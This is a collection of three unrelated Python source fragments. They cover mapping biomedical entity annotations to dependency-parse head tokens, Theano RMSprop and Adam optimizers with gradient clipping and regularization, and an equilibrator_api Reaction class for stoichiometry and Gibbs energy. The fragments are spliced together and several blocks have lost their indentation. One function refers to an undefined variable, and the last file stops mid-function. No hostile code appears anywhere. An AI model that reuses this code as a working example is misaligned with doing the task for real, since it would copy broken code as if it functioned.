if self.mergedEntityGraph == None:
self.mergedEntityGraph = self.makeEntityGraph(self.mergedEntities, self.interactions, self.mergedEntityToDuplicates)
return self.mergedEntityGraph.getOutEdges(entity)
else:
if self.entityGraph == None:
self.entityGraph = self.makeEntityGraph(self.entities, self.interactions)
return self.entityGraph.getOutEdges(entity)
# rv = []
# for interaction in self.interactions:
# if interaction.get("e1") == entity1.get("id") and interaction.get("e2") == entity2.get("id"):
# rv.append(interaction)
# return rv
    def mapInteractions(self, entityElements, interactionElements, verbose=False):
        """
        Maps the semantic interactions to the syntactic graph.
        Syntactic dependencies are defined between tokens. Semantic edges (interactions)
        are defined between annotated entities. To utilize the correlation of the dependency
        parse with the semantic interactions, the graphs must be aligned by mapping the
        interaction graph's nodes (entities) to the syntactic graph's nodes (tokens). This
        is done by determining the head tokens of the entities.
        @param entityElements: the semantic nodes (triggers and named entities)
        @type entityElements: list of cElementTree.Element objects
        @param interactionElements: the semantic edges (e.g. Cause and Theme for GENIA)
        @type interactionElements: list of cElementTree.Element objects
        @param verbose: Print selected head tokens on screen
        @param verbose: boolean
        """
        self.interactions = interactionElements
        self.entities = entityElements
        # Entities that have no text binding can not be mapped and are therefore removed
        for entity in self.entities[:]:
            if entity.get("charOffset") == "":
                self.entities.remove(entity)
        #self.interactionGraph = NX.XDiGraph(multiedges = multiedges)
        #if multiedges:
        #    self.interactionGraph = NX10.MultiDiGraph()
        #else:
        #    self.interactionGraph = NX10.DiGraph()
        # The interaction graph has tokens as nodes; interaction elements become its edges below
        self.interactionGraph = Graph()
        self.interactionGraph.addNodes(self.tokens)
        #for token in self.tokens:
        #    self.interactionGraph.add_node(token)
        self.entitiesByToken = {} # a mapping for fast access
        self.entitiesById = {}
        self.entityHeadTokenByEntity = {}
        sentenceSpan = (0, len(self.sentenceElement.get("text"))) # for validating the entity offsets
        # Determine a head token for each entity; entities with no matching token are dropped
        for entity in self.entities[:]:
            headToken = self.mapEntity(entity, verbose)
            if headToken != None:
                self.entityHeadTokenByEntity[entity] = headToken
                self.entitiesById[entity.get("id")] = entity
            else:
                # Check that the entity is within the sentence
                if not Range.overlap(Range.charOffsetToSingleTuple(entity.get("charOffset")), sentenceSpan):
                    raise Exception("Entity " + entity.get("id") + ", charOffset " + entity.get("charOffset") + ", does not overlap with sentence " + self.sentenceElement.get("id") + ", length " + str(sentenceSpan[1]) )
                # Assume there simply is no token corresponding to the entity
                self.entities.remove(entity)
        self._markNamedEntities()
        # Add one graph edge per (head-token-pair, interaction type); duplicates are skipped
        for interaction in self.interactions:
            if not self.entitiesById.has_key(interaction.get("e1")):
                continue # e1 is outside of this sentence
            if not self.entitiesById.has_key(interaction.get("e2")):
                continue # e2 is outside of this sentence
            token1 = self.entityHeadTokenByEntity[self.entitiesById[interaction.get("e1")]]
            token2 = self.entityHeadTokenByEntity[self.entitiesById[interaction.get("e2")]]
            # found = False
            # if multiedges:
            #     edges = self.interactionGraph.get_edge_data(token1, token2, default={})
            #     for i in range(len(edges)):
            #         edge = edges[i]["element"]
            #         if edge.attrib["type"] == interaction.attrib["type"]:
            #             found = True
            #             break
            # if not found:
            #     self.interactionGraph.add_edge(token1, token2, element=interaction)
            # else:
            #     self.duplicateInteractionEdgesRemoved += 1
            found = False
            edges = self.interactionGraph.getEdges(token1, token2)
            for edge in edges:
                if edge[2].get("type") == interaction.get("type"):
                    found = True
                    break
            if not found:
                self.interactionGraph.addEdge(token1, token2, interaction)
            else:
                # TODO: "skipped" would be better than "removed"
                self.duplicateInteractionEdgesRemoved += 1
    def mapEntity(self, entityElement, verbose=False):
        """
        Determine the head token for a named entity or trigger. The head token is the token closest
        to the root for the subtree of the dependency parse spanned by the text of the element.
        @param entityElement: a semantic node (trigger or named entity)
        @type entityElement: cElementTree.Element
        @param verbose: Print selected head tokens on screen
        @param verbose: boolean
        @return: the selected head token element, or None if no token overlaps the entity
        """
        headOffset = None
        if entityElement.get("headOffset") != None:
            headOffset = Range.charOffsetToSingleTuple(entityElement.get("headOffset"))
        if entityElement.get("charOffset") != "":
            charOffsets = Range.charOffsetToTuples(entityElement.get("charOffset"))
        else:
            charOffsets = []
        # Each entity can consist of multiple syntactic tokens, covered by its
        # charOffset-range. One of these must be chosen as the head token.
        headTokens = [] # potential head tokens
        for token in self.tokens:
            #print token.attrib["id"], token.attrib["charOffset"]
            tokenOffset = Range.charOffsetToSingleTuple(token.get("charOffset"))
            if headOffset != None and entityElement.get("type") != "Binding":
                # A head token can already be defined in the headOffset-attribute.
                # However, depending on the tokenization, even this range may
                # contain multiple tokens. Still, it can always be assumed that
                # if headOffset is defined, the correct head token is in this range.
                if Range.overlap(headOffset,tokenOffset):
                    headTokens.append(token)
            else:
                for offset in charOffsets:
                    if Range.overlap(offset,tokenOffset):
                        headTokens.append(token)
        if len(headTokens)==1: # An unambiguous head token was found
            token = headTokens[0]
        else: # One head token must be chosen from the candidates
            selHead = None
            # For "Binding" triggers, prefer a candidate whose text hints at binding
            if entityElement.get("type") == "Binding":
                for t in headTokens:
                    compText = t.get("text").lower()
                    if compText.find("bind") != -1 or compText.find("complex") != -1:
                        selHead = t
                        #print "Head:", selHead.get("text"), "/", entityElement.get("text"), entityElement.get("headOffset"), selHead.get("charOffset")
                        entityElement.set("headOffset", selHead.get("charOffset"))
                        break
            if selHead == None:
                token = self.findHeadToken(headTokens)
            else:
                token = selHead
            if verbose:
                print >> sys.stderr, "Selected head:", token.get("id"), token.get("text")
        #assert token != None, entityElement.get("id")
        if token != None:
            # The ElementTree entity-element is modified by setting the headOffset attribute
            if entityElement.get("headOffset") == None or entityElement.get("headOffset") != token.get("charOffset"):
                entityElement.set("headOffset", token.get("charOffset"))
            if not self.entitiesByToken.has_key(token):
                self.entitiesByToken[token] = []
            self.entitiesByToken[token].append(entityElement)
        else:
            # No token overlaps this entity; the caller (mapInteractions) removes it
            print >> sys.stderr, "Warning, no tokens for entity", entityElement.get("id")
        return token
# def mapEntityHints(self, verbose=False):
# """
# Determine the head token for a named entity or trigger. The head token is the token closest
# to the root for the subtree of the dependency parse spanned by the text of the element.
#
# @param entityElement: a semantic node (trigger or named entity)
# @type entityElement: cElementTree.Element
# @param verbose: Print selected head tokens on screen
# @param verbose: boolean
# """
# self.entityHints = self.sentenceElement.findall("entityHint")
# self.entityHintsByToken = {}
# for entityElement in self.entityHints:
# headOffset = None
# if entityElement.attrib.has_key("headOffset"):
# headOffset = Range.charOffsetToSingleTuple(entityElement.attrib["headOffset"])
# if entityElement.attrib["charOffset"] != "":
# charOffsets = Range.charOffsetToTuples(entityElement.attrib["charOffset"])
# else:
# charOffsets = []
# # Each entity can consist of multiple syntactic tokens, covered by its
# # charOffset-range. One of these must be chosen as the head token.
# headTokens = [] # potential head tokens
# for token in self.tokens:
# #print token.attrib["id"], token.attrib["charOffset"]
# tokenOffset = Range.charOffsetToSingleTuple(token.attrib["charOffset"])
# if headOffset != None:
# # A head token can already be defined in the headOffset-attribute.
# # However, depending on the tokenization, even this range may
# # contain multiple tokens. Still, it can always be assumed that
# # if headOffset is defined, the corret head token is in this range.
# if Range.overlap(headOffset,tokenOffset):
# headTokens.append(token)
# else:
# for offset in charOffsets:
# if Range.overlap(offset,tokenOffset):
# headTokens.append(token)
# if len(headTokens)==1: # An unambiguous head token was found
# token = headTokens[0]
# else: # One head token must be chosen from the candidates
# token = self.findHeadToken(headTokens)
# if verbose:
# print >> sys.stderr, "Selected head:", token.attrib["id"], token.attrib["text"]
# assert token != None, entityElement.get("id")
# if token != None:
# # The ElementTree entity-element is modified by setting the headOffset attribute
# if not entityElement.attrib.has_key("headOffset"):
# entityElement.attrib["headOffset"] = token.attrib["charOffset"]
# if not self.entityHintsByToken.has_key(token):
# self.entityHintsByToken[token] = []
# self.entityHintsByToken[token].append(entityElement)
def findHeadToken(self, candidateTokens):
"""
Select the candidate token that is closest to the root of the subtree of the depencdeny parse
to which the candidate tokens belong to. See getTokenHeadScores method for the algorithm.
@param candidateTokens: the list of syntactic tokens from which the head token is selected
@type candidateTokens: list of cElementTree.Element objects
"""
tokenHeadScores = self.getTokenHeadScores()
#if debug:
# print "Tokens:", candidateTokenIds
# print "Scores:", tokenScores
if len(candidateTokens) == 0:
return None
highestScore = -9999999
bestTokens = []
for token in candidateTokens:
if tokenHeadScores[token] > highestScore:
highestScore = tokenHeadScores[token]
for token in candidateTokens:
if tokenHeadScores[token] == highestScore:
bestTokens.append(token)
# if debug:
# print "tokens:"
# for i in range(len(candidateTokenIds)):
# print "[", candidateTokenIds[i], self.tokensById[candidateTokenIds[i]].text, tokenHeadScores[candidateTokenIds[i]], "]"
return bestTokens[-1]
    def getTokenHeadScores(self):
        """
        A head token is chosen using a heuristic that prefers tokens closer to the
        root of the dependency parse. In a list of candidate tokens, the one with
        the highest score is the head token. The return value of this method
        is a dictionary that maps token elements to their scores.
        As a side effect, each token element gets a "headScore" attribute.
        """
        # Token head scores are cached the first time this function is called
        if self.tokenHeadScores != None:
            return self.tokenHeadScores
        else:
            self.tokenHeadScores = {}
        # Give all tokens initial scores: 1 if connected by any dependency, else 0
        tokenById = {}
        for token in self.tokens:
            tokenId = token.get("id")
            assert tokenId not in tokenById
            tokenById[tokenId] = token
            self.tokenHeadScores[token] = 0 # initialize score as zero (unconnected token)
            for dependency in self.dependencies:
                if dependency.get("t1") == token.get("id") or dependency.get("t2") == token.get("id"):
                    self.tokenHeadScores[token] = 1 # token is connected by a dependency
                    break
        # Give a low score for tokens that clearly can't be head and are probably produced by hyphen-splitter
        for token in self.tokens:
            tokenText = token.get("text")
            if tokenText == "\\" or tokenText == "/" or tokenText == "-":
                self.tokenHeadScores[token] = -1
        # Loop over all dependencies and increase the scores of all governor tokens
        # until each governor token has a higher score than its dependent token.
        # Some dependencies might form a loop so a list is used to define those
        # dependency types used in determining head scores.
        depTypesToInclude = ["prep", "nn", "det", "hyphen", "num", "amod", "nmod", "appos", "measure", "dep", "partmod"]
        #depTypesToRemoveReverse = ["A/AN"]
        modifiedScores = True
        loopCount = 0 # loopcount for devel set approx. 2-4
        while modifiedScores == True: # loop until the scores no longer change (fix-point iteration)
            if loopCount > 20: # survive loops: bail out instead of iterating forever on cyclic parses
                print >> sys.stderr, "Warning, possible loop in parse for sentence", self.getSentenceId()
                break
            modifiedScores = False
            # for token1 in self.tokens:
            #     for token2 in self.tokens: # for each combination of tokens...
            for dep in self.dependencies: # ... check each dependency
                token1 = tokenById[dep.get("t1")]
                token2 = tokenById[dep.get("t2")]
                if dep.get("type") in depTypesToInclude:
                    # The governor token of the dependency must have a higher score
                    # than the dependent token.
                    if self.tokenHeadScores[token1] <= self.tokenHeadScores[token2]:
                        self.tokenHeadScores[token1] = self.tokenHeadScores[token2] + 1
                        modifiedScores = True
                # elif dep.attrib["t1"] == tokenI.attrib["id"] and dep.attrib["t2"] == tokenJ.attrib["id"] and (dep.attrib["type"] in depTypesToRemoveReverse):
                #     #tokenScores[i] -= 1
                #     if self.tokenHeadScores[tokenJ] <= self.tokenHeadScores[tokenI]:
                #         self.tokenHeadScores[tokenJ] = self.tokenHeadScores[tokenI] + 1
                #         modifiedScores = True
            loopCount += 1
        # Add scores to tokens
        for token in self.tokens:
            token.set("headScore", str(self.tokenHeadScores[token]))
        return self.tokenHeadScores
def _markNamedEntities(self):
"""
This method is used to define which tokens belong to _named_ entities.
Named entities are sometimes masked when testing learning of interactions, to
prevent the system making a trivial decision based on commonly interacting names.
This function assumes that all given entities are named entities.
"""
self.tokenIsName = {}
self.tokenIsEntity = {}
self.tokenIsEntityHead = {}
# Initialize the dictionaries
for token in self.tokens:
self.tokenIsName[token] = False
self.tokenIsEntity[token] = False
self.tokenIsEntityHead[token] = []
for entity in self.entities:
entityOffsets = Range.charOffsetToTuples(entity.get("charOffset"))
entityHeadOffset = Range.charOffsetToSingleTuple(entity.get("headOffset"))
for token in self.tokens:
tokenOffset = Range.charOffsetToSingleTuple(token.get("charOffset"))
for entityOffset in entityOffsets:
if Range.overlap(entityOffset, tokenOffset):
self.tokenIsEntity[token] = True
if entity.get("given") == "True":
self.tokenIsName[token] = True
# if entity.get("given") != None:
# if entity.get("given") == "True":
# self.tokenIsName[token] = True
# else:
# entity.set("given", "True")
# self.tokenIsName[token] = True
if Range.overlap(entityHeadOffset, tokenOffset):
self.tokenIsEntityHead[token].append(entity)
def getTokenText(self, token):
"""
Returns the text of a token, and masks it if the token is the head token
of a named entity.
@param token: interaction-XML syntactic token.
@type token: cElementTree.Element
"""
if self.tokenIsName[token]:
return "NAMED_ENT"
else:
return token.get("text")
def getCleared(self):
c = SentenceGraph(self.sentenceElement, self.tokens, self.dependencies)
namedEntities = []
for entity in self.entities:
if entity.get("given") == "True":
namedEntities.append(entity)
c.mapInteractions(namedEntities, [])
return c
def mergeInteractionGraph(self, merge=True):
"""
For merging duplicate entities
keepDuplicates - allows calling the function with no effect, so that the same code
can be used for merged and unmerged cases
"""
self.mergedEntities = []
self.mergedEntityToDuplicates = {}
#duplicates = {}
#mergedIds = {}
if not merge: # no entities are filtered
# Create dummy structures
for entity in self.entities:
mergedIds[entity] = entity.get("id")
self.mergedEntities.append(entity)
self.mergedEntityToDuplicates[entity] = []
return
# Mark all duplicates after the first one in the list for removal
removeEntities = [False] * len(self.entities)
entitiesToKeep = []
for i in range(len(self.entities)): # loop through all entities, including the last one
if removeEntities[i]: # entity has been already removed
continue
self.mergedEntities.append(self.entities[i])
#mergedIds[entities[i]] = entities[i].get("id")
self.mergedEntityToDuplicates[self.entities[i]] = []
if self.entities[i].get("given") == "True": # named entities are never merged
continue
for j in range(i+1, len(self.entities)): # loop through all entities coming after entity "i"
# Entities are duplicates if they have the same type and head token
# Also, they are not duplicates if the charOffset differs. This shoulnd't matter,
# as the head tokens are the same, but in practice, on the GE, task improves performance,
# maybe due to multiple similar examples affecting SVM learning.
if self.entities[i].get("type") == self.entities[j].get("type") and \
self.entities[i].get("charOffset") == self.entities[j].get("charOffset"): # and self.entityHeadTokenByEntity[self.entities[i]] == self.entityHeadTokenByEntity[self.entities[j]]:
removeEntities[j] = True
#mergedIds[entities[i]] += "/" + entities[j].get("id")
self.mergedEntityToDuplicates[self.entities[i]].append(self.entities[j])
#return entitiesToKeep, mergedIds, duplicates
| |
#LICENCE : for adam optimizer (Modified from https://gist.github.com/Newmu/acb738767acb4788bac3)
"""
The MIT License (MIT)
Copyright (c) 2015 Alec Radford
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import theano
import numpy as np
from theano import config
from collections import OrderedDict
import theano.tensor as T
"""
OPTIMIZERS FOR THEANO
"""
"""
UTILITY FUNCTIONS
"""
def regularize(cost, params, reg_val, reg_type, reg_spec):
    """
    Return a theano cost with an optional L1/L2 penalty added.
    cost: cost to regularize
    params: list of parameters (theano shared variables)
    reg_val: multiplier for regularizer
    reg_type: accepted types of regularizer 'l1','l2' (anything else: cost returned unchanged)
    reg_spec: substring filter; only parameters whose name contains it are regularized
    """
    # Penalty functions: L1 = sum of absolute values, L2 = sum of squares
    l1 = lambda p: T.sum(abs(p))
    l2 = lambda p: T.sum(p**2)
    rFxn = {}
    rFxn['l1']=l1
    rFxn['l2']=l2
    if reg_type=='l2' or reg_type=='l1':
        assert reg_val is not None,'Expecting reg_val to be specified'
        print "<< Reg:("+reg_type+') Reg. Val:('+str(reg_val)+') Reg. Spec.:('+reg_spec+')>>'
        # Accumulate the penalty of every parameter whose name matches reg_spec
        regularizer= theano.shared(np.asarray(0).astype(config.floatX),name = 'reg_norm', borrow=True)
        for p in params:
            if reg_spec in p.name:
                regularizer += rFxn[reg_type](p)
                print ('<<<<<< Adding '+reg_type+' regularization for '+p.name)+' >>>>>>'
        return cost + reg_val*regularizer
    else:
        return cost
def normalize(grads, grad_norm):
"""
grads: list of gradients
grad_norm : None (or positive value)
returns: gradients rescaled to satisfy norm constraints
"""
#Check if we're clipping gradients
if grad_norm is not None:
assert grad_norm > 0, 'Must specify a positive value to normalize to'
print '<<<<<< Normalizing Gradients to have norm (',grad_norm,') >>>>>>'
g2 = 0.
for g in grads:
g2 += (g**2).sum()
new_grads = []
for g in grads:
new_grads.append(T.switch(g2 > (grad_norm**2), g/T.sqrt(g2)*grad_norm, g))
return new_grads
else:
return grads
def rescale(grads, divide_grad):
"""
grads : list of gradients
divide_grad : scalar or theano variable
returns: gradients divided by provided variable
"""
if divide_grad is not None:
print '<<<<<< Rescaling Gradients >>>>>>'
new_grads = []
for g in grads:
new_grads.append(g/divide_grad)
return new_grads
else:
return grads
"""
OPTIMIZERS
"""
def rmsprop(cost, params, lr=0.002, rho=0.9, epsilon = 1e-8, opt_params = None,
            grad_range = None,
            grad_norm = None,
            reg_type = None,
            reg_value= None,
            reg_spec = 'DOESNOTMATCHANYTHING',
            divide_grad = None
            ):
    """
    RMSPROP Optimizer
    cost (to be minimized)
    params (list of parameters to take gradients with respect to)
    .... parameters specific to the optimization ...
    opt_params (if available, used to initialize the optimizer's shared variables)
    returns: update list of tuples,
             list of norms [0]: parameters [1]: gradients [2]: opt. params [3]: regularizer
             opt_params: dictionary containing all the parameters for the optimization
    """
    updates = []
    regularized_cost = regularize(cost, params, reg_value, reg_type, reg_spec)
    grads = T.grad(regularized_cost, params)
    # restartOpt == True means no saved optimizer state was given: create it fresh
    restartOpt = False
    if opt_params is None:
        restartOpt = True
        opt_params=OrderedDict()
    grads = rescale(grads, divide_grad)
    grads = normalize(grads, grad_norm)
    #No need to reload these
    g_norm = theano.shared(np.asarray(0).astype(config.floatX),name = 'g_norm',borrow=True)
    p_norm = theano.shared(np.asarray(0).astype(config.floatX),name = 'p_norm',borrow=True)
    opt_norm = theano.shared(np.asarray(0).astype(config.floatX),name = 'opt_norm',borrow=True)
    for p, g in zip(params,grads):
        if grad_range is not None:
            print '<<<<<< RMSPROP: Truncating Gradients in Range +-(',grad_range,') >>>>>>'
            g = T.clip(g,-grad_range, grad_range)
        if restartOpt:
            # f_prev: running average of gradients, r_prev: running average of squared gradients
            f_prev = theano.shared(p.get_value()*0.,name = 'opt_fprev_'+p.name)
            r_prev = theano.shared(p.get_value()*0.,name = 'opt_rprev_'+p.name)
            opt_params['opt_rprev_'+p.name] = r_prev
            opt_params['opt_fprev_'+p.name] = f_prev
        else:
            r_prev = opt_params['opt_rprev_'+p.name]
            f_prev = opt_params['opt_fprev_'+p.name]
        # Exponential moving averages of the gradient and its square
        f_cur = rho*f_prev+(1-rho)*g
        r_cur = rho*r_prev+(1-rho)*g**2
        updates.append((r_prev,r_cur))
        updates.append((f_prev,f_cur))
        # Per-parameter learning rate scaled by the (centered) RMS of the gradient
        lr_t = lr/T.sqrt(r_cur+f_cur**2+epsilon)
        p_t = p-(lr_t*g)
        updates.append((p,p_t))
        #Update norms
        g_norm += (g**2).sum()
        p_norm += (p**2).sum()
        opt_norm+=(r_prev**2).sum()
    return updates,[T.sqrt(p_norm), T.sqrt(g_norm), T.sqrt(opt_norm), regularized_cost], opt_params
def adam(cost, params, lr=0.001, b1=0.1, b2=0.001, e=1e-8, opt_params = None,
         grad_range= None, #Whether or not you would like to specify a range for grads
         grad_norm = None, #Clip gradients using normalization
         reg_type = None,# Can be 'l1' or 'l2' or ''
         reg_value = None, #Specify the multiplier for the regularization type
         reg_spec = 'DOESNOTMATCHANYTHING',#Restricting the weights to consider set to '' to regularize all
         divide_grad=None #Rescale the gradient by batch size
         ):
    """
    ADAM Optimizer (Kingma & Ba). NB: here b1/b2 are the COMPLEMENTS of the
    usual beta1/beta2 (decay is written as (1 - b1), (1 - b2)).
    cost (to be minimized)
    params (list of parameters to take gradients with respect to)
    .... parameters specific to the optimization ...
    opt_params (if available, used to initialize the optimizer's shared variables)
    returns: update list of tuples,
             list of norms [0]: parameters [1]: gradients [2]: opt. params [3]: regularizer
             opt_params: dictionary containing all the parameters for the optimization
    """
    updates = []
    regularized_cost = regularize(cost, params, reg_value, reg_type, reg_spec)
    grads = T.grad(regularized_cost, params)
    grads = rescale(grads, divide_grad)
    grads = normalize(grads, grad_norm)
    # restartOpt == True means no saved optimizer state was given: create it fresh
    restartOpt = False
    if opt_params is None:
        restartOpt = True
        opt_params=OrderedDict()
    #Track the optimization variable (timestep counter i)
    if restartOpt:
        i = theano.shared(np.asarray(0).astype(config.floatX),name ='opt_i',borrow=True)
        opt_params['opt_i'] = i
    else:
        i = opt_params['opt_i']
    #No need to reload these theano variables
    g_norm = theano.shared(np.asarray(0).astype(config.floatX),name = 'g_norm',borrow=True)
    p_norm = theano.shared(np.asarray(0).astype(config.floatX),name = 'p_norm',borrow=True)
    opt_norm = theano.shared(np.asarray(0).astype(config.floatX),name = 'opt_norm',borrow=True)
    #Initialization for ADAM: bias-correction terms for the moment estimates
    i_t = i + 1.
    fix1 = 1. - (1. - b1)**i_t
    fix2 = 1. - (1. - b2)**i_t
    lr_t = lr * (T.sqrt(fix2) / fix1)
    for p, g in zip(params, grads):
        if grad_range is not None:
            print '<<<<<< ADAM: Truncating Gradients in Range +-(',grad_range,') >>>>>>'
            g = T.clip(g,-grad_range, grad_range)
        if restartOpt:
            # m: first-moment (mean) estimate, v: second-moment (uncentered variance) estimate
            m = theano.shared(np.array(p.get_value() * 0.).astype(config.floatX),name = 'opt_m_'+p.name,borrow=True)
            v = theano.shared(np.array(p.get_value() * 0.).astype(config.floatX),name = 'opt_v_'+p.name,borrow=True)
            opt_params['opt_m_'+p.name] = m
            opt_params['opt_v_'+p.name] = v
        else:
            m = opt_params['opt_m_'+p.name]
            v = opt_params['opt_v_'+p.name]
        m_t = (b1 * g) + ((1. - b1) * m)
        v_t = (b2 * T.sqr(g)) + ((1. - b2) * v)
        g_t = m_t / (T.sqrt(v_t) + e)
        p_t = p - (lr_t * g_t)
        updates.append((m, m_t))
        updates.append((v, v_t))
        updates.append((p, p_t))
        #Update norms
        g_norm += (g**2).sum()
        p_norm += (p**2).sum()
        opt_norm+=(m**2).sum() + (v**2).sum()
    updates.append((i, i_t))
    return updates, [T.sqrt(p_norm), T.sqrt(g_norm), T.sqrt(opt_norm), regularized_cost], opt_params
| |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun Oct 1 12:59:43 2017
@author: noore
"""
import json
import logging
import os
import re

from numpy import inf, isnan, log, matrix, nan, zeros

from equilibrator_api import settings
from equilibrator_api.compound import Compound
COMPOUND_JSON_FNAME = os.path.join(settings.DATA_DIR, 'cc_compounds.json')
class Reaction(object):
    """
    A (bio)chemical reaction: a sparse stoichiometric map from KEGG compound
    IDs to coefficients (negative for substrates, positive for products).
    """

    # load formation energies from the JSON file
    COMPOUND_DICT = {}
    for cd in json.load(open(COMPOUND_JSON_FNAME, 'r')):
        kegg_id = cd.get('CID', 'unknown')
        COMPOUND_DICT[kegg_id] = cd

    # counter used to generate unique reaction IDs when none is provided
    REACTION_COUNTER = 0

    def __init__(self, kegg_id_to_coeff, rid=None):
        """
        Args:
            kegg_id_to_coeff - dict mapping KEGG compound IDs to stoichiometric
                coefficients (negative for substrates, positive for products)
            rid - optional reaction ID; if None, a unique one is generated
        """
        self.kegg_id_to_coeff = kegg_id_to_coeff

        # Create the relevant "Compound" objects and store in a dictionary
        self.kegg_id_to_compound = {}
        for kegg_id in self.kegg_id_to_coeff.keys():
            compound = Compound(Reaction.COMPOUND_DICT[kegg_id])
            self.kegg_id_to_compound[kegg_id] = compound

        if rid is not None:
            self.reaction_id = rid
        else:
            self.reaction_id = 'R%05d' % Reaction.REACTION_COUNTER
            Reaction.REACTION_COUNTER += 1

    def kegg_ids(self):
        """Return all KEGG compound IDs participating in this reaction."""
        return self.kegg_id_to_coeff.keys()

    def is_empty(self):
        """Return True if the reaction contains no compounds."""
        return len(self.kegg_id_to_coeff) == 0

    def get_coeff(self, kegg_id):
        """Return the stoichiometric coefficient of a compound (0 if absent)."""
        return self.kegg_id_to_coeff.get(kegg_id, 0)

    def get_compound(self, kegg_id):
        """Return the Compound object for a KEGG ID (None if absent)."""
        return self.kegg_id_to_compound.get(kegg_id, None)

    def dG0_prime(self, pH=settings.DEFAULT_PH, pMg=settings.DEFAULT_PMG,
                  ionic_strength=settings.DEFAULT_IONIC_STRENGTH):
        """Return the standard transformed reaction Gibbs energy (sum of
        coefficient-weighted compound dG'0 values)."""
        dG0_r_prime = 0
        for kegg_id in self.kegg_ids():
            coeff = self.get_coeff(kegg_id)
            compound = self.get_compound(kegg_id)
            dG0_r_prime += coeff * compound.dG0_prime(pH, pMg, ionic_strength)
        return dG0_r_prime

    def _GetSumCoeff(self):
        """
        Calculate the sum of all coefficients (excluding water).
        This is useful for shifting the dG'0 to another set of standard
        concentrations (e.g. 1 mM)
        """
        ids = set(self.kegg_ids()) - set(['C00001'])
        sum_coeff = sum(map(self.get_coeff, ids))
        return sum_coeff

    def _GetAbsSumCoeff(self):
        """
        Calculate the sum of all coefficients (excluding water) in
        absolute value.
        This is useful for calculating the reversibility index.
        """
        ids = set(self.kegg_ids()) - set(['C00001'])
        abs_sum_coeff = sum(map(abs, (map(self.get_coeff, ids))))
        return abs_sum_coeff

    def dGm_correction(self):
        """
        Correction term for shifting dG'0 to typical physiological
        concentrations (1 mM).
        """
        return settings.RT * self._GetSumCoeff() * log(1e-3)

    def dGm_prime(self):
        """
        Calculate the dG' in typical physiological concentrations (1 mM)
        """
        return self.dG0_prime() + self.dGm_correction()

    def reversibility_index(self, pH=settings.DEFAULT_PH, pMg=settings.DEFAULT_PMG,
                            ionic_strength=settings.DEFAULT_IONIC_STRENGTH):
        """
        Calculates the reversiblity index according to Noor et al. 2012:
        https://doi.org/10.1093/bioinformatics/bts317
        Returns:
            ln_RI - the natural log of the RI
        """
        dG0_prime = self.dG0_prime(pH, pMg, ionic_strength)
        return self.calculate_reversibility_index_from_dG0_prime(dG0_prime)

    def calculate_reversibility_index_from_dG0_prime(self, dG0_prime):
        """
        Calculates the reversiblity index according to Noor et al. 2012:
        https://doi.org/10.1093/bioinformatics/bts317
        Returns:
            ln_RI - the natural log of the RI (inf for an empty reaction)
        """
        sum_coeff = self._GetSumCoeff()
        abs_sum_coeff = self._GetAbsSumCoeff()
        if abs_sum_coeff == 0:
            return inf
        dGm_prime = dG0_prime + settings.RT * sum_coeff * log(1e-3)
        ln_RI = (2.0 / abs_sum_coeff) * dGm_prime / settings.RT
        return ln_RI

    @staticmethod
    def parse_formula_side(s):
        """
        Parses one side of a reaction formula, e.g. '2 C00001 + C00002 + 3 C00003'.
        Returns:
            A dict mapping each compound ID to its (summed) stoichiometric
            coefficient. The literal string "null" yields an empty dict.
        Raises:
            ValueError if a stoichiometric coefficient cannot be parsed.
        """
        if s.strip() == "null":
            return {}

        compound_bag = {}
        # raw string: '\s' in a plain literal is a deprecated invalid escape
        for member in re.split(r'\s+\+\s+', s):
            tokens = member.split(None, 1)  # check for stoichiometric coeff
            if len(tokens) == 0:
                continue
            if len(tokens) == 1:
                amount = 1
                key = member
            else:
                try:
                    amount = float(tokens[0])
                except ValueError:
                    raise ValueError('could not parse the reaction side: %s'
                                     % s)
                key = tokens[1]
            compound_bag[key] = compound_bag.get(key, 0) + amount
        return compound_bag

    @staticmethod
    def parse_formula(formula, name_to_cid=None, rid=None):
        """
        Parses a two-sided formula such as: 2 C00001 = C00002 + C00003
        Args:
            formula - a string representation of the chemical formula
            name_to_cid - (optional) a dictionary mapping names to KEGG IDs
            rid - (optional) a reaction ID to assign to the result
        Return:
            A Reaction object (protons, C00080, are removed if present)
        Raises:
            ValueError if no recognized reaction arrow is found.
        """
        tokens = []
        for arrow in settings.POSSIBLE_REACTION_ARROWS:
            if formula.find(arrow) != -1:
                tokens = formula.split(arrow, 2)
                break

        if len(tokens) < 2:
            # BUGFIX: the original message had one '%s' placeholder but two
            # arguments (arrow, formula), which raised a TypeError instead of
            # the intended ValueError.
            raise ValueError('Reaction does not contain an allowed arrow sign:'
                             ' %s' % formula)

        left = tokens[0].strip()
        right = tokens[1].strip()

        # substrates get negative coefficients, products positive ones
        sparse_reaction = {}
        for cid, count in Reaction.parse_formula_side(left).items():
            sparse_reaction[cid] = sparse_reaction.get(cid, 0) - count

        for cid, count in Reaction.parse_formula_side(right).items():
            sparse_reaction[cid] = sparse_reaction.get(cid, 0) + count

        # remove compounds that are balanced out in the reaction,
        # i.e. their coefficient is 0
        sparse_reaction = dict(filter(lambda x: x[1] != 0,
                                      sparse_reaction.items()))

        if name_to_cid is not None:
            # replace the names of the metabolites with their KEGG IDs
            # using this dictionary
            sparse_reaction = \
                dict(zip(map(name_to_cid.get, sparse_reaction.keys()),
                         sparse_reaction.values()))

        # ignore protons (H+): they are accounted for by the dG'0 transform
        if 'C00080' in sparse_reaction:
            sparse_reaction.pop('C00080')

        return Reaction(sparse_reaction, rid=rid)

    @staticmethod
    def write_compound_and_coeff(compound_id, coeff):
        """Format a single compound with its coefficient (omit coeff == 1)."""
        if coeff == 1:
